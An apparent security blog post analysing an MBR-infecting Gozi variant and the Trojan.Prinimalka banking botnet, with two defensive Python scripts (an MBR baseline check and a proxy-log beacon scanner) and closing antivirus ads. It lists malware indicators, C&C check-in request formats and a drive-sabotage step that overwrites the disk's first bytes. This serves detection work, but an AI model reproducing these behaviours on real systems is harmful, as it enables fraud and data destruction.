It seems as if security firm Trusteer has identified a new variant of the Gozi financial malware. This one is more sophisticated and requires your attention. This new variant infects the Master Boot Record (MBR) on your computer, the boot sector at the very beginning of your hard drive that tells your computer how to boot up.
Just like TDL4, another MBR infector, this malware is hard to detect and remove. The main idea behind Gozi, though, is to wait for Internet Explorer to be launched on the victim’s machine and then inject malicious code into the process. This allows the malware to intercept web traffic and inject its own code into webpages, misleading the user and collecting financial information (as well as social security numbers, birth dates, etc.).
Some speculate that other developers have taken over, since apparently the main developer as well as accomplices were arrested not long ago. It looks like the new developers have put a more sophisticated twist on the whole situation.
What’s different? The MBR rootkit component. This component makes the malware more sophisticated, because removing such a threat can cause the computer to fail to boot. The main problem when trying to fix infections in the MBR is that occasionally the backup of the original boot code, which is placed in a different sector, is modified so that it no longer works once the infection locks in. That forces you to keep the infected code on the machine rather than simply restore the backup. Because of that, it’s more effective to use private tools to help remove it.
One of the private tools, well, sort of private, is the Kaspersky Rescue Disk. There are others available too, including TDSSKiller, which may or may not work out correctly.
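As an added example (my code, not something from Trusteer’s report or any of the tools named above), here is a Python check that compares a 512-byte MBR sector against a previously saved known-good copy. It hashes the boot code, parses the four partition entries and checks the 0x55AA signature, then reports where the suspect sector differs; the same comparison works on the backup sector an MBR infector stashes elsewhere on the disk. The baseline and tampered sectors are constructed in memory, and the tampering functions and the device path in the comments are illustrative assumptions, not details taken from the malware.

```python
"""Compare an MBR sector against a known-good baseline (added example).

On Windows the live sector can be read as Administrator with
open(r"\\.\PhysicalDrive0", "rb").read(512); on Linux from /dev/sda.
Here both the baseline and the suspect sectors are constructed in memory.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446           # bytes 0-445: boot loader code
PART_TABLE_OFF = 446          # 4 entries x 16 bytes
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510-511


def parse_mbr(sector):
    """Split an MBR into boot-code hash, partition entries and signature flag."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("MBR must be exactly %d bytes" % SECTOR_SIZE)
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        status, ptype = sector[off], sector[off + 4]
        lba_start, lba_count = struct.unpack_from("<II", sector, off + 8)
        partitions.append({"bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "lba_count": lba_count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
    }


def compare_mbr(current, baseline):
    """Return a list of findings; an empty list means the sector matches the baseline."""
    cur, base = parse_mbr(current), parse_mbr(baseline)
    findings = []
    if not cur["signature_ok"]:
        findings.append("boot signature 0x55AA missing: disk will not boot")
    if cur["boot_code_sha256"] != base["boot_code_sha256"]:
        first = next(i for i in range(BOOT_CODE_LEN) if current[i] != baseline[i])
        findings.append("boot code differs from baseline starting at offset %d" % first)
    if cur["partitions"] != base["partitions"]:
        findings.append("partition table differs from baseline")
    return findings


def build_sample_mbr():
    """Constructed baseline: dummy boot stub, one bootable NTFS partition, valid signature."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * (BOOT_CODE_LEN - 7)
    entry = struct.pack("<B3sB3sII", 0x80, b"\x00\x00\x00", 0x07, b"\x00\x00\x00",
                        2048, 204800)
    table = entry + b"\x00" * 48      # three empty partition entries
    return boot_code + table + BOOT_SIGNATURE


def wiped_first_four_bytes(sector):
    """Simulated sabotage (assumption): the first four bytes of sector 0 overwritten."""
    return b"\x00" * 4 + sector[4:]


def replaced_boot_code(sector):
    """Simulated bootkit-style loader replacement (assumption); partition table kept."""
    rogue = b"\xeb\x00" * (BOOT_CODE_LEN // 2)
    return rogue + sector[BOOT_CODE_LEN:]


if __name__ == "__main__":
    baseline = build_sample_mbr()
    cases = [("clean", baseline),
             ("wiped", wiped_first_four_bytes(baseline)),
             ("replaced loader", replaced_boot_code(baseline)),
             ("no signature", baseline[:510] + b"\x00\x00")]
    for label, suspect in cases:
        print(label, "->", compare_mbr(suspect, baseline) or ["OK"])
```

Save the baseline copy while the machine is known clean (and keep it off the machine); a difference in the boot code with an unchanged partition table is the pattern to expect from a bootkit, while a missing signature or a zeroed start of the sector is what you would see after the kind of drive sabotage described for these trojans.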
If you need further help, we would love to assist. Please comment at any time!
A Gozi-looking variant, Trojan Prinimalka, has been identified among the Project Blitzkrieg-related issues for this fall. It’s unclear if the botherders are part of Project Blitzkrieg; however, it most certainly looks like them. This botnet issue has been described as a “war on banks”, with the warning that “banks are not ready”.
What’s more, with the attacks on banks, from HSBC a few weeks ago to JPMorgan Chase over a month ago, it is unclear if the botnet was used to carry out these attacks. Security researchers at top research firms are unsure of the conditions of the attacks and have made many attempts to get some data to help investigate all of this.
Here we describe some of the details of the malware used in this botnet: Trj.Prin, as seCURE Connexion labels it, or by its main names Gozi-Prinimalka or just Trojan.Prinimalka.
Confused yet? Trojan.Prinimalka is a banking trojan used to build a botnet, which is then used as a means to DDoS a banking website/server.
Two distinct variants are used: “gov” and “nah”.
Generalities of both variants:
- Mutex: sdfsdfsdfsdfsfsdfsdfsdfsdfsdf
- Configuration values for the botnet are automatically added by the dropper to the Registry under “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion”.
- A random port is opened on localhost (127.0.0.1), which allows the type 2 proxy SCKS command to function, and the malware binds cmd.exe to localhost for the TELN command.
- Makes anonymous requests to banking websites via the zombie computer (the victim’s computer).
- It attempts to inject itself into normal Windows system processes, such as services.exe, svchost.exe, SYSTEM, smss.exe, winlogon.exe, lsass.exe, csrss.exe, etc.
- Different bank URLs are targeted as well, and can be used in a bait-and-switch operation. The malware mainly acts like a HOSTS file: it can change the URL and redirect the banking site so that login information or other personal information can be obtained.
- Quick whois queries on the IP addresses identify “Ruslan Storozhenko” (yes?) at the hosting company “Tehnologii Budushego LLC”. This comes as no surprise, since the ngrBot was hosted at Tehnologii Budushego LLC. Not saying the hosting company is bad; however, the company should be on a big watch-out for fraudulent activity.
- The IP address 126.96.36.199 is related to multiple password-stealing and banking trojans. Project Honeypot lists the IP address as a dictionary attacker and content spammer.
- The general configuration and commands are described below.
gov variant:
- Type 1 command example on an XP system:
    GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: 213.***.**.104
- Dropped files: %UserProfile%\govXXXX.exe, where the “X”s are random lowercase letters.
- To proliferate the malware through the system, it first starts with govtemp1.exe, which is the dropper/downloader. It then attempts to update with govold.exe to make sure it has a new version. Sometimes it decides that a shutdown is needed, especially if the computer cannot be used in the botnet (i.e. the computer is not powerful enough, there is too much lag, etc.); in that case it overwrites the first four bytes of “\\.\PHYSICALDRIVE0” and then shuts down the computer.
- It maintains its presence on the machine by monitoring and reinstalling as needed with govXXXX.exe.
- Primary command and control (C&C) address: 188.8.131.52
- The configuration can be changed to nah, as described below.
nah variant:
- Has very similar features to the gov variant, except that the files are prefixed with “nah” instead of “gov”.
- It does have a different configuration for its command (type 2 command, XP system):
    GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: 193.xxx.92.xxx
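As an added example of turning the indicators above into detection logic (my code, not seCURE Connexion’s or anything pulled from the trojan), here is a Python scanner for proxy logs that flags the type 1 and type 2 check-in requests by their /system/prinimalka.py path and pulls out user_id, version_id, crc, uptime and port, marking whether the destination is the listed C&C address. The log line format, the client IPs, the user_id value and the 203.0.113.7 server are constructed for this example; the request shapes, version_id, crc values and the C&C address 188.8.131.52 are the ones listed above.

```python
"""Flag Trojan.Prinimalka check-in requests in proxy logs (added example).

Constructed log format used here, one request per line:
  <timestamp> <client_ip> <server_ip> "<request line>" "<user-agent>"
Only the /system/prinimalka.py/{command,options} path and the C&C address
188.8.131.52 come from the write-up; everything else is made up for the demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = re.compile(r"^/system/prinimalka\.py/(?P<kind>command|options)$")
REQUEST_TYPE = {"command": 1, "options": 2}   # type 1 (gov) / type 2 (nah) check-ins
KNOWN_C2 = {"188.8.131.52"}                    # primary C&C address from the write-up

LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) "(?P<req>[^"]*)" "(?P<ua>[^"]*)"$')


def parse_beacon(request_line):
    """Return the beacon fields if the request line is a Prinimalka check-in, else None."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    m = BEACON_PATH.match(url.path)
    if not m:
        return None
    q = parse_qs(url.query, keep_blank_values=True)

    def first(key):
        return q.get(key, [""])[0]

    return {
        "type": REQUEST_TYPE[m.group("kind")],
        "user_id": first("user_id"),
        "version_id": first("version_id"),
        "crc": first("crc"),
        "uptime": first("uptime"),   # only seen in the type 2 request above
        "port": first("port"),       # port value the bot reports in type 2 requests
    }


def scan_log(lines):
    """Scan log lines; return one finding per beacon with source, destination and fields."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue                 # not in the expected log format
        beacon = parse_beacon(m.group("req"))
        if beacon is None:
            continue                 # ordinary request, not a check-in
        beacon.update({
            "src": m.group("src"),
            "dst": m.group("dst"),
            "known_c2": m.group("dst") in KNOWN_C2,
            "user_agent": m.group("ua"),
        })
        findings.append(beacon)
    return findings


# Constructed sample log lines: client IPs, user_id and 203.0.113.7 are made up.
SAMPLE_LOG = [
    '2012-10-08T09:12:01 10.1.2.50 188.8.131.52 "GET /system/prinimalka.py/command'
    '?user_id=1234567890&version_id=022201&crc=00000000 HTTP/1.1" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '2012-10-08T09:12:05 10.1.2.50 203.0.113.7 "GET /index.html HTTP/1.1" "Mozilla/5.0"',
    '2012-10-08T09:13:00 10.1.2.77 203.0.113.7 "GET /system/prinimalka.py/options'
    '?user_id=1234567890&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= '
    'HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    'garbage line that does not match the log format',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("type %d check-in from %s to %s (known C&C: %s) user_id=%s port=%s"
              % (f["type"], f["src"], f["dst"], f["known_c2"], f["user_id"], f["port"]))
```

The path match is what carries the detection; the C&C set only adds confidence, since the Host values in the write-up are partly masked and the operators can move servers. A type 2 hit to an address not in the set is still worth an alert, and the extracted user_id lets you group check-ins from the same bot across log days.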
Overall, this banking trojan has quite a few robust capabilities, but nothing really new. It looks a lot like the Gozi trojan and may be a competitor to some other botnets like TDL or similar.
To protect against botnets and other malware, don’t miss out on your chance for security software below (two specials):
Kaspersky ONE Universal Security – $25 off & get Laplink PCmover Home FREE!
Get avast! Internet Security 7 for 25% off now!